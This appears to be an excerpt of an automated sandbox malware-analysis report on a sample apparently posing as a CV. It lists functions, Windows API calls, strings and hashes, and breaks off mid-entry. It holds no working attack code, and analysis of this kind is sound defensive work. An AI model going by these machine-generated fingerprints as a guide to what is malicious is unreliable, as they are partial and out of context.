GetWindowRect.USER32(00000000,?), ref: 0032EE20
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0032EE63
GetDlgItem.USER32(?,000003EA), ref: 0032EE71
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0032EE8E
InvalidateRect.USER32(?,00000000,00000001), ref: 0032EE9B

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 1ee2a620557a9d1272fb451abe0c7fdf85dc06310fcf70ce9394965a0e0cd98e
Instruction ID: e2e85962774a6138d7796f1271ad0a8016f92a8dba4a31d9bde637d1f04757d3
Opcode Fuzzy Hash: 1ee2a620557a9d1272fb451abe0c7fdf85dc06310fcf70ce9394965a0e0cd98e
Instruction Fuzzy Hash: 87513FB1B00205AFDB19DF68DD86AAEBBBAFF88710F55812DF519E7290D7709D408B10

Function 0030B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0030B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0030B759,?,00000000,?,?,?,?,0030B72B,00000000,?), ref: 0030BA58

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0030B72B), ref: 0030B7F6
KillTimer.USER32(00000000,?,00000000,?,?,?,?,0030B72B,00000000,?,?,0030B2EF,?,?), ref: 0030B88D
DestroyAcceleratorTable.USER32(00000000), ref: 0036D8A6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0030B72B,00000000,?,?,0030B2EF,?,?), ref: 0036D8D7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0030B72B,00000000,?,?,0030B2EF,?,?), ref: 0036D8EE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0030B72B,00000000,?,?,0030B2EF,?,?), ref: 0036D90A
DeleteObject.GDI32(00000000), ref: 0036D91C

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: ce9cc5718bd4f7c706d9c13c121d6b317edacdcf7c9b0020a051ee2211a4b91e
Instruction ID: 65d013825d571278ee74039978f94338e41a9cb99bbd4b077424b6e9d021be08
Opcode Fuzzy Hash: ce9cc5718bd4f7c706d9c13c121d6b317edacdcf7c9b0020a051ee2211a4b91e
Instruction Fuzzy Hash: 89618C30A02600DFDB379F18D9A8B25B7F9FF94715F25851DE5468AAB4C770A890DF40

Function 0030B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 0030B526: GetWindowLongW.USER32(?,000000EB), ref: 0030B537

GetSysColor.USER32(0000000F), ref: 0030B438

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 8965d80c97c5b316da265247701a3b86e73f0f63e6bec6777ef17ba88dca5dcf
Instruction ID: 8299c4c591bec5ffbca04111ba24496cb46b3fc6c23acaaf43432e11ea6d2e25
Opcode Fuzzy Hash: 8965d80c97c5b316da265247701a3b86e73f0f63e6bec6777ef17ba88dca5dcf
Instruction Fuzzy Hash: D141C130102104AFDB235F29DC99BB97B69AF06730F598261FD698E1E6D7318D82C721

Function 0033690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 00336923
_wcscpy.LIBCMT ref: 00336934
__wsplitpath.LIBCMT ref: 00336958
__wsplitpath.LIBCMT ref: 00336979
_wcscpy.LIBCMT ref: 0033699B
_wcscpy.LIBCMT ref: 003369B9
_wcscpy.LIBCMT ref: 003369C7
_wcscat.LIBCMT ref: 003369D6
_wcscat.LIBCMT ref: 00336A2B
_wcscat.LIBCMT ref: 00336A61
_wcscat.LIBCMT ref: 00336A73

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: a165d3f5e92803f89b54d0804694e223f87c97dfb1e5844280abeff5b40a84fc
Instruction ID: b83017858b5323c0c2381d3ed4d1ed3214e7ba6fe4cf5bd87f231502297d85e0
Opcode Fuzzy Hash: a165d3f5e92803f89b54d0804694e223f87c97dfb1e5844280abeff5b40a84fc
Instruction Fuzzy Hash: D641217684511CAECF6ADB90DC86DDBB3BCEB48300F1041E6F659A6051EE70A7E58F50

Function 0033D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(0038DC00,0038DC00,0038DC00), ref: 0033D7CE
GetDriveTypeW.KERNEL32(?,003A3A70,00000061), ref: 0033D898
_wcscpy.LIBCMT ref: 0033D8C2

Strings

cdrom, xrefs: 0033D7EA
ramdisk, xrefs: 0033D842
unknown, xrefs: 0033D859
fixed, xrefs: 0033D816
removable, xrefs: 0033D800
all, xrefs: 0033D7D4
network, xrefs: 0033D82C

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 7eb99d181dc312295aababf11b3c856471dfe27d3dc14d36865de981b63bf27d
Instruction ID: 72e0d307a3ed92c54e331b41c57c6a84324a001af0326c70e1dcd12d5cd08bcd
Opcode Fuzzy Hash: 7eb99d181dc312295aababf11b3c856471dfe27d3dc14d36865de981b63bf27d
Instruction Fuzzy Hash: 26519F35204304AFC706EF14E8D2AAEB7A5EF85314F10882DF59A5B2A2DB31ED15CB42

Function 002F936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 002F93AB
__itow.LIBCMT ref: 002F93DF

Part of subcall function 00311557: _xtow@16.LIBCMT ref: 00311578

Strings

False, xrefs: 00364C93
0x%p, xrefs: 00364CAD
True, xrefs: 00364C8C
%.15g, xrefs: 002F93A5

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: 97bc6943fa53da0492b309d1fc7ed0901cfb0c1681ed431eaabb35a91006ac31
Instruction ID: daceb3e93803aa2ae707c4d70ae987cac6a0d5f828b0eef6f122a33b86972d90
Opcode Fuzzy Hash: 97bc6943fa53da0492b309d1fc7ed0901cfb0c1681ed431eaabb35a91006ac31
Instruction Fuzzy Hash: 5B41D771910209AFDB25EF74D941FB9B7E8EB48340F2044BAE649D72C5EA719991CB10

Function 0035A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0035A259
CreateCompatibleDC.GDI32(00000000), ref: 0035A260
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0035A273
SelectObject.GDI32(00000000,00000000), ref: 0035A27B
GetPixel.GDI32(00000000,00000000,00000000), ref: 0035A286
DeleteDC.GDI32(00000000), ref: 0035A28F
GetWindowLongW.USER32(?,000000EC), ref: 0035A299
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0035A2AD
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0035A2B9

Strings

static, xrefs: 0035A1F1

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 44b0c1795cb7d9e605a703a9381286e090bc50c87b75ffc5ec26316dfa4ae11e
Instruction ID: b85cd550b4f6fba91d683dc797daf38af7171856cfcb60fd1e0b458631c2a956
Opcode Fuzzy Hash: 44b0c1795cb7d9e605a703a9381286e090bc50c87b75ffc5ec26316dfa4ae11e
Instruction Fuzzy Hash: C8316E31100519ABDF225FA4DC4AFEA3B7DFF09761F110314FA19A60A0C736D855DBA5

Function 00336F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00336F1D
gethostname.WSOCK32(?,00000100), ref: 00336F37
gethostbyname.WSOCK32(?), ref: 00336F44
_wcscpy.LIBCMT ref: 00336F6C
inet_ntoa.WSOCK32(?), ref: 00336F8A
_strcat.LIBCMT ref: 00336F98
_wcscpy.LIBCMT ref: 00336FAF
WSACleanup.WSOCK32 ref: 00336FBD
_wcscpy.LIBCMT ref: 00336FCB

Strings

0.0.0.0, xrefs: 00336F66

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 2620052-3771769585
Opcode ID: 0418d843c66ebd679bd903590fe657a5692e1d83f6ba91af98610897fdc38b80
Instruction ID: 68123cefc4992ba4cf2bcfbf1536c1266c4184dd327b0e758dc9f86085e121bb
Opcode Fuzzy Hash: 0418d843c66ebd679bd903590fe657a5692e1d83f6ba91af98610897fdc38b80
Instruction Fuzzy Hash: 2711B471504219BFCB2BAB60AC8AEEA77BCEF45710F014065F159AA091EFB0DAC58B50

Function 0031500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00315047

Part of subcall function 00317C0E: __getptd_noexit.LIBCMT ref: 00317C0E

__gmtime64_s.LIBCMT ref: 003150E0
__gmtime64_s.LIBCMT ref: 00315116
__gmtime64_s.LIBCMT ref: 00315133
__allrem.LIBCMT ref: 00315189
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003151A5
__allrem.LIBCMT ref: 003151BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003151DA
__allrem.LIBCMT ref: 003151F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0031520F
__invoke_watson.LIBCMT ref: 00315280

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction ID: 1841de82609ba3c4b4604c239e7cdf4fabdcba9f09ae3e0648c29ca0c9a97b16
Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction Fuzzy Hash: 32710672A00B16EBD71A9F68CC41BEA73A8BF9C364F144639F510DA681E770D9C08BD0

Function 00334DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00334DF8
GetMenuItemInfoW.USER32(003B1708,000000FF,00000000,00000030), ref: 00334E59
SetMenuItemInfoW.USER32(003B1708,00000004,00000000,00000030), ref: 00334E8F
Sleep.KERNEL32(000001F4), ref: 00334EA1
GetMenuItemCount.USER32(?), ref: 00334EE5
GetMenuItemID.USER32(?,00000000), ref: 00334F01
GetMenuItemID.USER32(?,-00000001), ref: 00334F2B
GetMenuItemID.USER32(?,?), ref: 00334F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00334FB6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00334FCA
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00334FEB

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: b0f667b97a3fdcf10ee6b033c21cf0a405503aa4205be88e124d1584e996df24
Instruction ID: fba37519aa432d41c67a3233d1eab203413ea7224f56a55fba731177cfc5ff3b
Opcode Fuzzy Hash: b0f667b97a3fdcf10ee6b033c21cf0a405503aa4205be88e124d1584e996df24
Instruction Fuzzy Hash: 0E618C71900249AFDB22DFA4D8C8EAE7BB8FF45318F190159F946A7251D731BD45CB20

Function 00359C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00359C98
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00359C9B
GetWindowLongW.USER32(?,000000F0), ref: 00359CBF
_memset.LIBCMT ref: 00359CD0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00359CE2
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00359D5A

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 8fa2531153daff4a14c4b84e9e3f1700182c9d585c71bb68f103b19ee8e959f5
Instruction ID: b406e872c7e427e3ea87d398142d0125e29e23a83b8c5ec3a8e11acf30482fa0
Opcode Fuzzy Hash: 8fa2531153daff4a14c4b84e9e3f1700182c9d585c71bb68f103b19ee8e959f5
Instruction Fuzzy Hash: 5B616A75900208EFDB22DFA8CC81FEEB7B8EB09714F14415AFE05AB2A1D774A945DB50

Function 003294E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 003294FE
SafeArrayAllocData.OLEAUT32(?), ref: 00329549
VariantInit.OLEAUT32(?), ref: 0032955B
SafeArrayAccessData.OLEAUT32(?,?), ref: 0032957B
VariantCopy.OLEAUT32(?,?), ref: 003295BE
SafeArrayUnaccessData.OLEAUT32(?), ref: 003295D2
VariantClear.OLEAUT32(?), ref: 003295E7
SafeArrayDestroyData.OLEAUT32(?), ref: 003295F4
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003295FD
VariantClear.OLEAUT32(?), ref: 0032960F
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0032961A

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: d78a352b7021c9901d85c56c3999961377436abe8bc507c0d5a46415f507c88d
Instruction ID: 954b41c6c3cd0a7f21058c723e5a724d6f68ee7fb3fe8bf4b923ed88f6bb220b
Opcode Fuzzy Hash: d78a352b7021c9901d85c56c3999961377436abe8bc507c0d5a46415f507c88d
Instruction Fuzzy Hash: 1B413231E00219AFCB12EFA5D848ADEBBBDFF08354F108065E515A7251DB35EA85CBA1

Function 0034BB08 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 264COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0034BB5C
VariantInit.OLEAUT32(?), ref: 0034BC2D
VariantInit.OLEAUT32(?), ref: 0034BD2E
VariantClear.OLEAUT32(?), ref: 0034BD38
VariantClear.OLEAUT32(?), ref: 0034BD99

Strings

h?:, xrefs: 0034BB2D
|?:, xrefs: 0034BB34
Null Object assignment in FOR..IN loop, xrefs: 0034BBBD, 0034BCEB, 0034BDA7
Incorrect Object type in FOR..IN loop, xrefs: 0034BD11

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?:$|?:
API String ID: 2862541840-1826607493
Opcode ID: 01f2874f5d305166ebae0da2e0e55baf49705000a3b4723d40f51e49c01ba726
Instruction ID: 4f3e1fe937a902e1b53d8b6f5c5afa24fc9fa86363004cddd1d870c13fd5bb7a
Opcode Fuzzy Hash: 01f2874f5d305166ebae0da2e0e55baf49705000a3b4723d40f51e49c01ba726
Instruction Fuzzy Hash: AD916D71E00219ABDB26DFA5C884FAEBBB8EF45710F108559F515AF290DB70E944CFA0

Function 0034ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 002F936C: __swprintf.LIBCMT ref: 002F93AB
Part of subcall function 002F936C: __itow.LIBCMT ref: 002F93DF

CoInitialize.OLE32 ref: 0034ADF6
CoUninitialize.OLE32 ref: 0034AE01
CoCreateInstance.OLE32(?,00000000,00000017,0037D8FC,?), ref: 0034AE61
IIDFromString.OLE32(?,?), ref: 0034AED4
VariantInit.OLEAUT32(?), ref: 0034AF6E
VariantClear.OLEAUT32(?), ref: 0034AFCF

Strings

Failed to create object, xrefs: 0034AE6C, 0034AF22
Invalid parameter, xrefs: 0034AEED
NULL Pointer assignment, xrefs: 0034AEA6

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: f1e0d93e8c5e94413b585affc100f9fcd689d6ff99da1874de6c7b930af6c93a
Instruction ID: 9a5452e7760dd689739ee6d6757492b3d5d45bfc5285345910b54c40b5f68e2d
Opcode Fuzzy Hash: f1e0d93e8c5e94413b585affc100f9fcd689d6ff99da1874de6c7b930af6c93a
Instruction Fuzzy Hash: 5E619A71248B11EFD722DF54C888B6AB7E8AF89704F004419F9859F291C770ED88CB93

Function 00348107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00348168
inet_addr.WSOCK32(?,?,?), ref: 003481AD
gethostbyname.WSOCK32(?), ref: 003481B9
IcmpCreateFile.IPHLPAPI ref: 003481C7
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00348237
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0034824D
IcmpCloseHandle.IPHLPAPI(00000000), ref: 003482C2
WSACleanup.WSOCK32 ref: 003482C8

Strings

Ping, xrefs: 003481EB

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: c31e924380959d6128511c1c4a2b021396e71b78eaae7de1f20a25175ae6876f
Instruction ID: 989195de25a1b51fa00f055ea3fef523351b4da866d60cdbc53688d88b669f7e
Opcode Fuzzy Hash: c31e924380959d6128511c1c4a2b021396e71b78eaae7de1f20a25175ae6876f
Instruction Fuzzy Hash: F55181316047009FD722AF64CC85B6EB7E9EF48310F054929FA5ADF2A1DB70E945CB41

Function 0033E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0033E396
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0033E40C
